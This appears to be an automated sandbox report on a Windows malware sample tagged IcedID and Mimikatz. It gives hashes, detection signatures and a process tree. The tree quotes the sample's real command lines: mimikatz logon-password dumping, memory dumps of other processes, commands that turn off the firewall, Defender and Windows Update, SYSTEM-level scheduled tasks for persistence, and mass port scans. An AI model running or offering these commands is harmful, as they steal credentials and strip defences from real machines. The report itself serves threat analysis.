Analysis
max time kernel: 151s
max time network: 156s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-04-2024 00:52
Behavioral task: behavioral1
Sample: 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
Resource: win7-20240221-en
General
Target: 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
Size: 13.7MB
MD5: 74dae0e65f4adbbb80aa9b3df54fc6df
SHA1: ef164798ed552d0b5e3cbd5d4c2188c0d0b8e685
SHA256: b3afe8e32a494c46bdac407dbf8ac9078516217e10d770ec4a337c32a5f2c2eb
SHA512: 4f1805c88f8e09b6c6738c6efbc88407e03dd9aefdbcae95e7a1d93f2761bd696800c21e0ecbb2d46be81042ac7cd67781187ef8014404a9f5f168287bf11464
SSDEEP: 98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 4448 created 1652 | 4448 | naustif.exe | spoolsv.exe
-
Contacts a large (25099) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/1088-136-0x00007FF75CD80000-0x00007FF75CE6E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
-
UPX dump on OEP (original entry point) 40 IoCs
-
XMRig Miner payload 11 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4648-0-0x0000000000400000-0x0000000000AA4000-memory.dmp | mimikatz
C:\Windows\rkilesrw\naustif.exe | mimikatz
behavioral2/memory/2716-7-0x0000000000400000-0x0000000000AA4000-memory.dmp | mimikatz
behavioral2/memory/1088-136-0x00007FF75CD80000-0x00007FF75CE6E000-memory.dmp | mimikatz
-
Drops file in Drivers directory 3 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | naustif.exe
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | naustif.exe
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
pid | process
2420 | netsh.exe
3960 | netsh.exe
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 30 IoCs
-
Loads dropped DLL 12 IoCs
Processes:
pid | process
2720 | wpcap.exe
2720 | wpcap.exe
2720 | wpcap.exe
2720 | wpcap.exe
2720 | wpcap.exe
2720 | wpcap.exe
2720 | wpcap.exe
2720 | wpcap.exe
2720 | wpcap.exe
1316 | eblttilyr.exe
1316 | eblttilyr.exe
1316 | eblttilyr.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
72 | ifconfig.me
73 | ifconfig.me
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
4244 | sc.exe
2120 | sc.exe
4092 | sc.exe
1472 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource | yara_rule
C:\Windows\rkilesrw\naustif.exe | nsis_installer_2
C:\Windows\tteyulnen\igasksjja\wpcap.exe | nsis_installer_1
C:\Windows\tteyulnen\igasksjja\wpcap.exe | nsis_installer_2
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
3468 | schtasks.exe
4056 | schtasks.exe
1304 | schtasks.exe
-
Modifies data under HKEY_USERS 47 IoCs
-
Modifies registry class 14 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | naustif.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | naustif.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | naustif.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | naustif.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | naustif.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | naustif.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | naustif.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | naustif.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | naustif.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | naustif.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | naustif.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | naustif.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | naustif.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | naustif.exe
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid  process
- 664  (process column empty; listed 15 times)
-
Suspicious behavior: RenamesItself 1 IoCs
Processes: 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
pid  process
- 4648  2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
token  pid  process
- SeDebugPrivilege  4648  2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
- SeDebugPrivilege  2716  naustif.exe
- SeDebugPrivilege  4448  naustif.exe
- SeDebugPrivilege  1088  vfshost.exe
- SeDebugPrivilege  3684  skyttnyln.exe
- SeLockMemoryPrivilege  2948  ybtnut.exe
- SeLockMemoryPrivilege  2948  ybtnut.exe
- SeDebugPrivilege  4536  skyttnyln.exe
- SeDebugPrivilege  4452  skyttnyln.exe
- SeDebugPrivilege  3396  skyttnyln.exe
- SeDebugPrivilege  2080  skyttnyln.exe
- SeDebugPrivilege  1140  skyttnyln.exe
- SeDebugPrivilege  4396  skyttnyln.exe
- SeDebugPrivilege  2188  skyttnyln.exe
- SeDebugPrivilege  3276  skyttnyln.exe
- SeDebugPrivilege  4020  skyttnyln.exe
- SeDebugPrivilege  3084  skyttnyln.exe
- SeDebugPrivilege  3088  skyttnyln.exe
- SeDebugPrivilege  2392  skyttnyln.exe
- SeDebugPrivilege  3484  skyttnyln.exe
- SeDebugPrivilege  1704  skyttnyln.exe
- SeDebugPrivilege  6612  skyttnyln.exe
- SeDebugPrivilege  5888  skyttnyln.exe
- SeDebugPrivilege  6944  skyttnyln.exe
- SeDebugPrivilege  5044  skyttnyln.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid  process
- 4648  2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
- 4648  2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
- 2716  naustif.exe
- 2716  naustif.exe
- 4448  naustif.exe
- 4448  naustif.exe
- 1188  xohudmc.exe
- 2892  jobnom.exe
- 1544  naustif.exe
- 1544  naustif.exe
- 3484  naustif.exe
- 3484  naustif.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid -> target pid  (source process -> target process); each row appears three times in the report unless noted
- 4648 -> 4516  (2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe -> cmd.exe)
- 4516 -> 4436  (cmd.exe -> PING.EXE)
- 4516 -> 2716  (cmd.exe -> naustif.exe)
- 4448 -> 2044  (naustif.exe -> cmd.exe)
- 2044 -> 1548  (cmd.exe -> cmd.exe)
- 2044 -> 3428  (cmd.exe -> cacls.exe)
- 2044 -> 3092  (cmd.exe -> cmd.exe)
- 2044 -> 3852  (cmd.exe -> cacls.exe)
- 2044 -> 1304  (cmd.exe -> cmd.exe)
- 2044 -> 3836  (cmd.exe -> cacls.exe)
- 4448 -> 2008  (naustif.exe -> netsh.exe)
- 4448 -> 2604  (naustif.exe -> netsh.exe)
- 4448 -> 4496  (naustif.exe -> netsh.exe)
- 4448 -> 3684  (naustif.exe -> cmd.exe)
- 3684 -> 2720  (cmd.exe -> wpcap.exe)
- 2720 -> 2356  (wpcap.exe -> net.exe)
- 2356 -> 1564  (net.exe -> net1.exe)
- 2720 -> 4404  (wpcap.exe -> net.exe)
- 4404 -> 2780  (net.exe -> net1.exe)
- 2720 -> 3948  (wpcap.exe -> net.exe)
- 3948 -> 5016  (net.exe -> net1.exe)
- 2720 -> 4292  (wpcap.exe -> net.exe; listed once, where the 64-entry table is cut off)
-
Processes
(process tree; each entry shows image path and PID, then its command line and the signatures triggered by it; child processes are indented under their parent)

C:\Windows\System32\spoolsv.exe  PID:1652
  cmd: C:\Windows\System32\spoolsv.exe
    C:\Windows\TEMP\vzignttnc\ybtnut.exe  PID:2948
      cmd: "C:\Windows\TEMP\vzignttnc\ybtnut.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe  PID:4648
  cmd: "C:\Users\Admin\AppData\Local\Temp\2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe"
  - Drops file in Windows directory
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe  PID:4516
      cmd: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rkilesrw\naustif.exe
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\PING.EXE  PID:4436
          cmd: ping 127.0.0.1 -n 5
          - Runs ping.exe
        C:\Windows\rkilesrw\naustif.exe  PID:2716
          cmd: C:\Windows\rkilesrw\naustif.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx

C:\Windows\rkilesrw\naustif.exe  PID:4448
  cmd: C:\Windows\rkilesrw\naustif.exe
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Sets file execution options in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe  PID:2044
      cmd: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe  PID:1548
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  PID:3428
          cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
        C:\Windows\SysWOW64\cmd.exe  PID:3092
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  PID:3852
          cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
        C:\Windows\SysWOW64\cmd.exe  PID:1304
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  PID:3836
          cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    C:\Windows\SysWOW64\netsh.exe  PID:2008
      cmd: netsh ipsec static del all
    C:\Windows\SysWOW64\netsh.exe  PID:2604
      cmd: netsh ipsec static add policy name=Bastards description=FuckingBastards
    C:\Windows\SysWOW64\netsh.exe  PID:4496
      cmd: netsh ipsec static add filteraction name=BastardsList action=block
    C:\Windows\SysWOW64\cmd.exe  PID:3684
      cmd: cmd /c C:\Windows\tteyulnen\igasksjja\wpcap.exe /S
      - Suspicious use of WriteProcessMemory
        C:\Windows\tteyulnen\igasksjja\wpcap.exe  PID:2720
          cmd: C:\Windows\tteyulnen\igasksjja\wpcap.exe /S
          - Drops file in Drivers directory
          - Executes dropped EXE
          - Loads dropped DLL
          - Drops file in System32 directory
          - Drops file in Program Files directory
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\net.exe  PID:2356
              cmd: net stop "Boundary Meter"
              - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe  PID:1564
                  cmd: C:\Windows\system32\net1 stop "Boundary Meter"
            C:\Windows\SysWOW64\net.exe  PID:4404
              cmd: net stop "TrueSight Meter"
              - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe  PID:2780
                  cmd: C:\Windows\system32\net1 stop "TrueSight Meter"
            C:\Windows\SysWOW64\net.exe  PID:3948
              cmd: net stop npf
              - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe  PID:5016
                  cmd: C:\Windows\system32\net1 stop npf
            C:\Windows\SysWOW64\net.exe  PID:4292
              cmd: net start npf
                C:\Windows\SysWOW64\net1.exe  PID:3172
                  cmd: C:\Windows\system32\net1 start npf
    C:\Windows\SysWOW64\cmd.exe  PID:2856
      cmd: cmd /c net start npf
        C:\Windows\SysWOW64\net.exe  PID:3992
          cmd: net start npf
            C:\Windows\SysWOW64\net1.exe  PID:4948
              cmd: C:\Windows\system32\net1 start npf
    C:\Windows\SysWOW64\cmd.exe  PID:4356
      cmd: cmd /c net start npf
        C:\Windows\SysWOW64\net.exe  PID:3840
          cmd: net start npf
            C:\Windows\SysWOW64\net1.exe  PID:1088
              cmd: C:\Windows\system32\net1 start npf
    C:\Windows\SysWOW64\cmd.exe  PID:2392
      cmd: cmd /c C:\Windows\tteyulnen\igasksjja\eblttilyr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tteyulnen\igasksjja\Scant.txt
        C:\Windows\tteyulnen\igasksjja\eblttilyr.exe  PID:1316
          cmd: C:\Windows\tteyulnen\igasksjja\eblttilyr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tteyulnen\igasksjja\Scant.txt
          - Executes dropped EXE
          - Loads dropped DLL
    C:\Windows\SysWOW64\cmd.exe  PID:4888
      cmd: cmd /c C:\Windows\tteyulnen\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tteyulnen\Corporate\log.txt
      - Drops file in Windows directory
        C:\Windows\tteyulnen\Corporate\vfshost.exe  PID:1088
          cmd: C:\Windows\tteyulnen\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe  PID:740
      cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tfintytmv" /ru system /tr "cmd /c C:\Windows\ime\naustif.exe"
        C:\Windows\SysWOW64\cmd.exe  PID:4584
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\schtasks.exe  PID:1304
          cmd: schtasks /create /sc minute /mo 1 /tn "tfintytmv" /ru system /tr "cmd /c C:\Windows\ime\naustif.exe"
          - Creates scheduled task(s)
    C:\Windows\SysWOW64\cmd.exe  PID:4536
      cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anlmrcstj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F"
        C:\Windows\SysWOW64\cmd.exe  PID:4436
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\schtasks.exe  PID:3468
          cmd: schtasks /create /sc minute /mo 1 /tn "anlmrcstj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F"
          - Creates scheduled task(s)
    C:\Windows\SysWOW64\cmd.exe  PID:1844
      cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iazatujnv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F"
        C:\Windows\SysWOW64\cmd.exe  PID:332
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\schtasks.exe  PID:4056
          cmd: schtasks /create /sc minute /mo 1 /tn "iazatujnv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F"
          - Creates scheduled task(s)
    C:\Windows\SysWOW64\netsh.exe  PID:3880
      cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
    C:\Windows\SysWOW64\netsh.exe  PID:1544
      cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
    C:\Windows\SysWOW64\netsh.exe  PID:3084
      cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    C:\Windows\SysWOW64\netsh.exe  PID:3948
      cmd: netsh ipsec static set policy name=Bastards assign=y
    C:\Windows\SysWOW64\netsh.exe  PID:4548
      cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
    C:\Windows\SysWOW64\netsh.exe  PID:4052
      cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
    C:\Windows\SysWOW64\netsh.exe  PID:928
      cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    C:\Windows\SysWOW64\netsh.exe  PID:4356
      cmd: netsh ipsec static set policy name=Bastards assign=y
    C:\Windows\SysWOW64\netsh.exe  PID:4196
      cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    C:\Windows\SysWOW64\netsh.exe  PID:1956
      cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
    C:\Windows\SysWOW64\netsh.exe  PID:3640
      cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:3684
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 780 C:\Windows\TEMP\tteyulnen\780.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\netsh.exe  PID:3092
      cmd: netsh ipsec static set policy name=Bastards assign=y
    C:\Windows\SysWOW64\cmd.exe  PID:3844
      cmd: cmd /c net stop SharedAccess
        C:\Windows\System32\Conhost.exe  PID:1304
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        C:\Windows\SysWOW64\net.exe  PID:3992
          cmd: net stop SharedAccess
            C:\Windows\SysWOW64\net1.exe  PID:4992
              cmd: C:\Windows\system32\net1 stop SharedAccess
    C:\Windows\SysWOW64\cmd.exe  PID:3056
      cmd: cmd /c netsh firewall set opmode mode=disable
        C:\Windows\SysWOW64\netsh.exe  PID:2420
          cmd: netsh firewall set opmode mode=disable
          - Modifies Windows Firewall
    C:\Windows\SysWOW64\cmd.exe  PID:3576
      cmd: cmd /c netsh Advfirewall set allprofiles state off
        C:\Windows\SysWOW64\netsh.exe  PID:3960
          cmd: netsh Advfirewall set allprofiles state off
          - Modifies Windows Firewall
    C:\Windows\SysWOW64\cmd.exe  PID:4060
      cmd: cmd /c net stop MpsSvc
        C:\Windows\SysWOW64\net.exe  PID:2876
          cmd: net stop MpsSvc
            C:\Windows\SysWOW64\net1.exe  PID:1828
              cmd: C:\Windows\system32\net1 stop MpsSvc
    C:\Windows\SysWOW64\cmd.exe  PID:4888
      cmd: cmd /c net stop WinDefend
        C:\Windows\System32\Conhost.exe  PID:1544
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        C:\Windows\SysWOW64\net.exe  PID:2580
          cmd: net stop WinDefend
            C:\Windows\SysWOW64\net1.exe  PID:4288
              cmd: C:\Windows\system32\net1 stop WinDefend
    C:\Windows\SysWOW64\cmd.exe  PID:2916
      cmd: cmd /c net stop wuauserv
        C:\Windows\SysWOW64\net.exe  PID:2044
          cmd: net stop wuauserv
            C:\Windows\SysWOW64\net1.exe  PID:332
              cmd: C:\Windows\system32\net1 stop wuauserv
    C:\Windows\SysWOW64\cmd.exe  PID:3384
      cmd: cmd /c sc config MpsSvc start= disabled
        C:\Windows\SysWOW64\sc.exe  PID:1472
          cmd: sc config MpsSvc start= disabled
          - Launches sc.exe
    C:\Windows\SysWOW64\cmd.exe  PID:3460
      cmd: cmd /c sc config SharedAccess start= disabled
        C:\Windows\SysWOW64\sc.exe  PID:2120
          cmd: sc config SharedAccess start= disabled
          - Launches sc.exe
    C:\Windows\SysWOW64\cmd.exe  PID:4364
      cmd: cmd /c sc config WinDefend start= disabled
        C:\Windows\SysWOW64\sc.exe  PID:4244
          cmd: sc config WinDefend start= disabled
          - Launches sc.exe
    C:\Windows\SysWOW64\cmd.exe  PID:4552
      cmd: cmd /c sc config wuauserv start= disabled
        C:\Windows\SysWOW64\sc.exe  PID:4092
          cmd: sc config wuauserv start= disabled
          - Launches sc.exe
    C:\Windows\TEMP\xohudmc.exe  PID:1188
      cmd: C:\Windows\TEMP\xohudmc.exe
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of SetWindowsHookEx
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:4536
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 64 C:\Windows\TEMP\tteyulnen\64.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:4452
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 1652 C:\Windows\TEMP\tteyulnen\1652.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:3396
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2512 C:\Windows\TEMP\tteyulnen\2512.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:2080
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2616 C:\Windows\TEMP\tteyulnen\2616.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:1140
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2752 C:\Windows\TEMP\tteyulnen\2752.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:4396
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2848 C:\Windows\TEMP\tteyulnen\2848.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:2188
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3700 C:\Windows\TEMP\tteyulnen\3700.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:3276
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3796 C:\Windows\TEMP\tteyulnen\3796.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:4020
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3924 C:\Windows\TEMP\tteyulnen\3924.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:3084
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 4004 C:\Windows\TEMP\tteyulnen\4004.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:3088
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3416 C:\Windows\TEMP\tteyulnen\3416.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:2392
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 4940 C:\Windows\TEMP\tteyulnen\4940.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe  PID:3980
      cmd: cmd.exe /c C:\Windows\tteyulnen\igasksjja\scan.bat
        C:\Windows\tteyulnen\igasksjja\krslbantt.exe  PID:32
          cmd: krslbantt.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
          - Executes dropped EXE
          - Drops file in Windows directory
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:3484
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 4460 C:\Windows\TEMP\tteyulnen\4460.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:1704
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2032 C:\Windows\TEMP\tteyulnen\2032.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:6612
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2240 C:\Windows\TEMP\tteyulnen\2240.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:5888
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3488 C:\Windows\TEMP\tteyulnen\3488.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:6944
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3980 C:\Windows\TEMP\tteyulnen\3980.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\tteyulnen\skyttnyln.exe  PID:5044
      cmd: C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 212 C:\Windows\TEMP\tteyulnen\212.dmp
      - Executes dropped EXE
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe  PID:5304
      cmd: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        C:\Windows\SysWOW64\cmd.exe  PID:5588
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  PID:2388
          cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
        C:\Windows\SysWOW64\cmd.exe  PID:6772
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe  PID:5676
          cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
        C:\Windows\SysWOW64\cmd.exe  PID:4396
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
